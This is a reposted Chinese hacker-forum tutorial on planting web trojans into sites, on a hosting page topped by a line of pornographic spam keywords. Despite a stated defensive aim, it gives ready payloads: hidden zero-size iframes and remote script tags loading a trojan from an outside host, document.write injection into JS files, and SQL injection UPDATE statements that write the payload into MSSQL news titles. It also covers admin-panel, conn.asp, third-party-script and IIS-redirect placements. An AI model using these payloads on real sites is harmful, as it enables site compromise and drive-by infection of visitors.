国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開APP
userphoto
未登錄

開通VIP,暢享免費電子書等14項超值服

開通VIP

首頁

好書

留言交流

下載APP

聯(lián)系客服
[轉(zhuǎn)載]多姿多彩的網(wǎng)站掛馬方式 邪惡八進制信息安全團隊技術(shù)論壇
[轉(zhuǎn)載]多姿多彩的網(wǎng)站掛馬方式

信息來源:黑客基地

--------------------------------------------------------------------------
先說明一點,不是怎么教大家掛馬,是讓你學(xué)會掛馬,怎么防守,怎么找馬,怎么找關(guān)鍵字,怎么讓你學(xué)會別人是通過什么方法掛到你的網(wǎng)站上的..
有利就有弊,隨便怎么看吧。
--------------------------------------------------------------------------

這里我拿掛首頁index.asp來舉例子。
  
  先說一說,得到webshell的掛馬方法
  一般的掛馬的都是用框架,這是最基本的掛馬方式,只要不破壞原有的語言邏輯,那就想插入哪里就寫哪里了,最基本的語句當(dāng)然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>,其中http://www.fucksb.net/mm.htm是我們的木馬,下面就不一個一個提示了。
 
  上面可能是一般的掛馬方式,也是初學(xué)者的玩法,好了,再說深一點點的,那就是js文件,好多網(wǎng)站上,你查看源代碼都會調(diào)用js文件,其中的語句為<script language=javascript src=./ad/ad.js></script>,想到了什么,這里也可以掛馬,其中我們可以遠(yuǎn)程調(diào)用自己的js,比如:<script language=javascript src=http://www.fucksb.net/mm.js></script>這個mm.js就可以寫木馬了,怎么寫呢,同樣,我們還用最基本的iframe框架,不過在<script></script>之中可識別語言不是html,那怎么辦呢,follow me,js文件可以這樣寫:document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>");,這種形勢,這時就可以執(zhí)行此js中的代碼了,當(dāng)然了,說白了,其實全語句就是<script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script>呵呵。。

  聰明的你可能發(fā)現(xiàn)了一點,好像不止是js文件哦~,只要在<script></script>之中,無論什么后綴的文件,只要里面寫的語句可以被javascript識別就會執(zhí)行,對的,比如<script src=http://www.fucksb.net/mm.test></script>,又如<script src=http://www.fucksb.net/mm.lala></script>管他的后綴是什么,只要里面寫的語句正確就會被執(zhí)行了。

  同樣,如果首頁調(diào)用其它網(wǎng)站,或者次級目錄中的htm,asp等如:<iframe src=./ad/news.htm width=300 height=200></iframe>
也可以在news.htm文件里掛馬,可以是htm和js,隨便哪種,這是比較隱蔽的玩法,這些適用于主頁沒有寫權(quán)限的方法。

  <script>同<iframe>2個相比較,好處是script整體掛馬的代碼長度比iframe小得多,很實用。說實用是在數(shù)據(jù)庫方面,下面介紹。

    數(shù)據(jù)庫掛馬,這里我們拿mssql數(shù)據(jù)庫為例子。

  這里說的是首頁調(diào)用到的數(shù)據(jù)庫,比如新聞,論壇,公告,等等,一般是標(biāo)題。這些需要經(jīng)驗去檢測,舉個例子,比如首頁有一條新聞為:“明日開業(yè)”,那么鼠標(biāo)點此新聞,地址欄打開的新窗口為news.asp?id=1,這種情況,這時,就可以判斷此新聞是從數(shù)據(jù)庫中調(diào)用的了,當(dāng)然了,我們不說access,只說mssql。
  首頁,我們要有這個網(wǎng)站中的一個注入點,比如就點在vote.asp?id=123,同時,至少是Db_owner權(quán)限,這時如果要掛馬可以不用取到webshell,因為如果我們的目的只在于掛馬的話,而且有時,還得檢測mssql數(shù)據(jù)庫和web服務(wù)器不在同一個機器上,那掛馬的方式就是更改數(shù)據(jù)庫內(nèi)容,這里我說的就是這種,如上面說的,首頁顯示的一條新聞標(biāo)題為“明日開業(yè)”,如果首頁顯示的標(biāo)題是“明日開業(yè)</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>”,那這樣的話,首頁就會執(zhí)行這段代碼了,像這種情況,找到了注入點,就得找表名,如此新聞的表名為news,字段為title,id,等等,根據(jù)猜測,id=1時,暴出的字段title的值就為“明日開業(yè)”,那么90%就可以猜到了,首頁調(diào)用的數(shù)據(jù)庫的字段就為news表中的title,這時在注入點,可以大膽提交vote.asp?id=123;update news set title=‘明日開業(yè)</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>‘ where id=1;--,這樣就可以更改數(shù)據(jù)庫了,前提是最少要少db_owner權(quán)限,當(dāng)然也有時由于代碼原因,也可以這樣提交:vote.asp?id=123‘;update news set title=‘明日開業(yè)</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>‘ where id=1 and ‘1‘=‘1,也可以...
  這種方法是有問題的,實戰(zhàn)中存在不少問題,因為一般的情況下,標(biāo)題都是通過<table>來限制寬度,也就是說如果你的標(biāo)題的長度超過了指定的長度,那么你的代碼只能寫一半,這樣就不能執(zhí)行了,所以掛馬最好的方法是用<script>這種方法來掛馬了,如:
vote.asp?id=123;update news set title=‘明日開業(yè)</a><script src=http://www.fucksb.net/mm.js></script>‘ where id=1;--長度有很大的減少,很不錯。
 
  后臺掛馬
  通常注入等不到webshell,就只能靠進后臺掛馬。

  這里說的是進入了后臺,但不能通過后臺得到webshell,這時要仔細(xì)關(guān)察后臺,像比較網(wǎng)站的鏈接、頂部底部的廣告、都可以直接寫入你的木馬代碼,等等,后臺是靈活的,具體問題具體分析。不過有一點很重要,是不要打亂前臺htm源文件里的代碼邏輯,比如應(yīng)該閉合前面的<a><img>"( 等這些符號,應(yīng)該先閉合掉如</a></img>")。

  其它形式

  如一首頁調(diào)用了<iframe src=vote.asp?id=1&no=view width=100></iframe>此種形勢,一樣可以在vote.asp中直接寫入iframe木馬代碼,如果調(diào)用的是<script src=vote.asp?id=1&no=view width=100></script>在vote.asp寫代碼時,請用document.write("")這種格式寫入,當(dāng)然,如果被掛文件中還有調(diào)用的文件可以繼續(xù)往深處寫,如果你夠狠的話,直接寫到數(shù)據(jù)庫配置文件中,如conn.asp,這樣好多頁面可以同時掛上你的一種木馬了。
  當(dāng)然這里也有js文件,一樣原理。
  掛一個網(wǎng)站的馬,不一定就得攻入他,有時沒有方法的同時,可以考慮跨站。好多站用了別的站的js文件,如:<script src=http://www.163.com/user.js>這種情勢,這時就可以考慮只拿163.com的權(quán)限就行了,只要能修改到user.js文件就可以掛到你要掛的站點了,同理,也有<iframe src=http://www.163.com/user.htm>此種情況,一樣道理,劍走偏鋒,達到目的,無論用什么招數(shù)了。
 
  服務(wù)器掛馬
  這里簡單說一個比較狠的吧.
  重定向任何調(diào)用的htm,js,等文件,只要是執(zhí)行的如圖:



這種方法在計算中用搜索關(guān)鍵詞是搜索不到的,反正本地怎么找也找不到。。誰能想到是在iis里設(shè)置的呢?而且調(diào)用文件那么多,怎么知道是重定向的那個文件呢?反正現(xiàn)在想不到有什么好方法可以解決,如果服務(wù)器如上圖被掛馬了,偶最好的建議是重裝IIS..^_^
本站僅提供存儲服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊舉報。
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
源碼
保護自己的源碼js禁止右鍵、復(fù)制(Ctrl C)、另存為、查看源文件
二行CSS代碼解決全部網(wǎng)頁script、iframe木馬其他
HTML在線編輯器的調(diào)用方法和使用方法詳解 - 遇見未來
超酷實用的天氣預(yù)報代碼匯總
News Article
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長圖 關(guān)注 下載文章
綁定賬號成功
后續(xù)可登錄賬號暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點擊這里聯(lián)系客服!

聯(lián)系客服